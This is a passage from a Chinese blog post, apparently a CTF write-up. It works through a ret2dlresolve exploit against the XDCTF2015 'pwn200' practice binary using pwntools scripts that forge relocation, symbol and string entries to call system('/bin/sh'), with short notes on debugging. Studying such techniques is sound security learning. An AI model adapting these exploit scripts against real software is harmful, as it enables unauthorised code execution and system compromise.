class="built_in">len</span>(binsh))</span><br><span class="line">payload2=payload2+fuckret</span><br><span class="line">payload2=payload2.ljust(<span class="number">80</span>,<span class="string">&#x27;s&#x27;</span>)</span><br><span class="line">payload2=payload2+binsh</span><br><span class="line">sh.sendline(payload2)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>



<p>第三步 伪造符号重定位表</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">bss=elf.bss()</span><br><span class="line">lea_ret=<span class="number">0x08048481</span></span><br><span class="line">read=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">stack_size=<span class="number">0x800</span></span><br><span class="line">bss_base=bss+stack_size</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x6c</span>+p32(bss_base)+p32(read)+p32(lea_ret)+p32(<span class="number">0</span>)+p32(bss_base)+p32(<span class="number">100</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Welcome to XDCTF2015~!\n&#x27;</span>)</span><br><span class="line">sh.sendline(payload1)</span><br><span class="line">plt_first=<span class="number">0x8048370</span></span><br><span class="line">binsh=<span class="string">&quot;bin/sh\x00&quot;</span></span><br><span class="line">bin_addr=bss_base+<span class="number">80</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#fuck_ret</span></span><br><span class="line">ret_plt=<span class="number">0x08048318</span></span><br><span class="line">dynsym=<span class="number">0x080481d8</span></span><br><span class="line">fuckret_addr=bss_base+<span class="number">28</span></span><br><span class="line">reloc_arg=fuckret_addr-ret_plt</span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(<span class="number">0x507</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#fucksym_add</span></span><br><span class="line">fucksym_addr=bss_base+<span class="number">36</span></span><br><span class="line">offset=<span class="number">0x10</span>-((fucksym_addr-dynsym)&amp;<span class="number">0xf</span>)</span><br><span class="line">fucksym_addr=fucksym_addr+offset</span><br><span class="line"></span><br><span class="line">r_info=(fucksym_addr-dynsym)/<span class="number">0x10</span></span><br><span class="line">r_info=(r_info &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line"></span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(r_info)</span><br><span class="line">st_name=<span class="number">0x54</span></span><br><span class="line">fucksym=p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x4</span>+p32(plt_first)+p32(reloc_arg)+p32(<span class="number">0</span>)+p32(<span class="number">1</span>)+p32(bin_addr)+p32(<span class="built_in">len</span>(binsh))</span><br><span class="line">payload2=payload2+fuckret</span><br><span class="line">payload2+=<span class="string">&#x27;a&#x27;</span>*offset</span><br><span class="line">payload2+=fucksym</span><br><span class="line">payload2 = payload2.ljust(<span class="number">80</span>,<span class="string">&#x27;D&#x27;</span>)</span><br><span class="line">payload2=payload2+binsh</span><br><span class="line">sh.sendline(payload2)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>本来stack是0x500，但是死活不回显数据，后来改成0x800才行，也不知道为啥，好怪，查这个地址还不存在</p>
<p>第四步 伪造符号表</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">bss=elf.bss()</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(bss)</span><br><span class="line">lea_ret=<span class="number">0x08048481</span></span><br><span class="line">read=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">stack_size=<span class="number">0x800</span></span><br><span class="line">bss_base=bss+stack_size</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x6c</span>+p32(bss_base)+p32(read)+p32(lea_ret)+p32(<span class="number">0</span>)+p32(bss_base)+p32(<span class="number">100</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Welcome to XDCTF2015~!\n&#x27;</span>)</span><br><span class="line">sh.sendline(payload1)</span><br><span class="line">plt_first=<span class="number">0x8048370</span></span><br><span class="line">binsh=<span class="string">&quot;bin/sh\x00&quot;</span></span><br><span class="line">bin_addr=bss_base+<span class="number">80</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#fuck_ret</span></span><br><span class="line">ret_plt=<span class="number">0x08048318</span></span><br><span class="line">dynsym=<span class="number">0x080481d8</span></span><br><span class="line">fuckret_addr=bss_base+<span class="number">28</span></span><br><span class="line">reloc_arg=fuckret_addr-ret_plt</span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(<span class="number">0x507</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#fucksym_add</span></span><br><span class="line">fucksym_addr=bss_base+<span class="number">36</span></span><br><span class="line">offset=<span class="number">0x10</span>-((fucksym_addr-dynsym)&amp;<span class="number">0xf</span>)</span><br><span class="line">fucksym_addr=fucksym_addr+offset</span><br><span class="line"></span><br><span class="line">r_info=(fucksym_addr-dynsym)/<span class="number">0x10</span></span><br><span class="line">r_info=(r_info &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line"></span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(r_info)</span><br><span class="line">st_name=<span class="number">0x54</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#fuckstr</span></span><br><span class="line">fuckstr_write=fucksym_addr+<span class="number">16</span></span><br><span class="line">dynstr=<span class="number">0x08048268</span></span><br><span class="line">st_name=fuckstr_write-dynstr</span><br><span class="line">fucksym=p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x4</span>+p32(plt_first)+p32(reloc_arg)+p32(<span class="number">0</span>)+p32(<span class="number">1</span>)+p32(bin_addr)+p32(<span class="built_in">len</span>(binsh))</span><br><span class="line">payload2=payload2+fuckret</span><br><span class="line">payload2+=<span class="string">&#x27;a&#x27;</span>*offset</span><br><span class="line">payload2+=fucksym+<span class="string">&#x27;write\x00&#x27;</span></span><br><span class="line">payload2 = payload2.ljust(<span class="number">80</span>,<span class="string">&#x27;D&#x27;</span>)</span><br><span class="line">payload2=payload2+binsh</span><br><span class="line">sh.sendline(payload2)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>第五步 </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn200&#x27;</span>)</span><br><span class="line">bss=elf.bss()</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(bss)</span><br><span class="line">lea_ret=<span class="number">0x08048481</span></span><br><span class="line">read=elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">stack_size=<span class="number">0x800</span></span><br><span class="line">bss_base=bss+stack_size</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x6c</span>+p32(bss_base)+p32(read)+p32(lea_ret)+p32(<span class="number">0</span>)+p32(bss_base)+p32(<span class="number">100</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Welcome to XDCTF2015~!\n&#x27;</span>)</span><br><span class="line">sh.sendline(payload1)</span><br><span class="line">plt_first=<span class="number">0x8048370</span></span><br><span class="line">binsh=<span class="string">&quot;/bin/sh\x00&quot;</span></span><br><span class="line">bin_addr=bss_base+<span class="number">80</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#fuck_ret</span></span><br><span class="line">ret_plt=<span class="number">0x08048318</span></span><br><span class="line">dynsym=<span class="number">0x080481d8</span></span><br><span class="line">fuckret_addr=bss_base+<span class="number">28</span></span><br><span class="line">reloc_arg=fuckret_addr-ret_plt</span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(<span class="number">0x507</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#fucksym_add</span></span><br><span class="line">fucksym_addr=bss_base+<span class="number">36</span></span><br><span class="line">offset=<span class="number">0x10</span>-((fucksym_addr-dynsym)&amp;<span class="number">0xf</span>)</span><br><span class="line">fucksym_addr=fucksym_addr+offset</span><br><span class="line"></span><br><span class="line">r_info=(fucksym_addr-dynsym)/<span class="number">0x10</span></span><br><span class="line">r_info=(r_info &lt;&lt; <span class="number">8</span>) | <span class="number">0x7</span></span><br><span class="line"></span><br><span class="line">fuckret=p32(<span class="number">0x0804a010</span>)+p32(r_info)</span><br><span class="line">st_name=<span class="number">0x54</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#fuckstr</span></span><br><span class="line">fuckstr_write=fucksym_addr+<span class="number">16</span></span><br><span class="line">dynstr=<span class="number">0x08048268</span></span><br><span class="line">st_name=fuckstr_write-dynstr</span><br><span class="line">fucksym=p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x4</span>+p32(plt_first)+p32(reloc_arg)+p32(<span class="number">0</span>)+p32(bin_addr)+<span class="string">&quot;aaaaaaaa&quot;</span></span><br><span class="line">payload2=payload2+fuckret</span><br><span class="line">payload2+=<span class="string">&#x27;a&#x27;</span>*offset</span><br><span class="line">payload2+=fucksym+<span class="string">&#x27;system\x00&#x27;</span></span><br><span class="line">payload2 = payload2.ljust(<span class="number">80</span>,<span class="string">&#x27;D&#x27;</span>)</span><br><span class="line">payload2=payload2+binsh</span><br><span class="line">sh.sendline(payload2)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>



<p>刚开始参数是bin/sh,但是会报错，但改成/bin/sh就好了，后来问了mark佬才明白，system会把参数当成shell命令执行，在根目录寻找bin里有个sh程序能打开一个持续的shell窗口，system配合/bin/sh就能打开持续的Shell窗口，但是如果执行bin/sh，就会在当前目录里寻找bin目录，因为不存在所以报错，我猜之前一直执行的bin/sh是因为程序就在根目录上。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2021/11/05/fmt-bss/" rel="next" title="fmt_bss">
      fmt_bss <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2dresolve"><span class="nav-number">1.</span> <span class="nav-text">ret2dresolve</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BB%B6%E8%BF%9F%E7%BB%91%E5%AE%9A%E5%85%A8%E8%BF%87%E7%A8%8B"><span class="nav-number">1.1.</span> <span class="nav-text">延迟绑定全过程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.2.</span> <span class="nav-text">复现</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
